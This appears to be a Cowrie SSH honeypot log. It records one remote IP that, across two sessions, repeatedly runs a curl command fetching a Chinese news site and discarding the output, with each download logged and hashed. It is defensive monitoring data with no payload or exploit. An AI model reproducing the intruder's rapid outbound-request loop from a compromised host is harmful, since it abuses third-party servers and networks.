{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.397454Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.398013Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.400757Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.410687Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.411290Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.425428Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.431441Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.438809Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.441324Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.441910Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.453407Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.454055Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.456625Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.482978Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.483620Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.492018Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.492603Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.518812Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.519556Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.525980Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.530314Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.530932Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.533105Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.554929Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.555643Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.567691Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.568408Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.575485Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.590235Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.591361Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.592202Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.598717Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.602441Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.606275Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.607232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.621610Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.629572Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.630402Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.634907Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.643484Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.644147Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.666414Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.667440Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.675380Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.684554Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.685661Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.686201Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.691041Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.695458Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.702156Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.703704Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.704483Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.709288Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.711422Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.727381Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.728164Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.744626Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.746011Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.766233Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.767079Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.771122Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.775779Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.778917Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.782707Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.783407Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.795842Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.821359Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.822260Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.827612Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.828277Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.860712Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.861512Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.864157Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.864980Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.873115Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.901062Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.901828Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.904916Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.905424Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.920273Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.941813Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.942524Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.945688Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.946290Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.962435Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.979369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
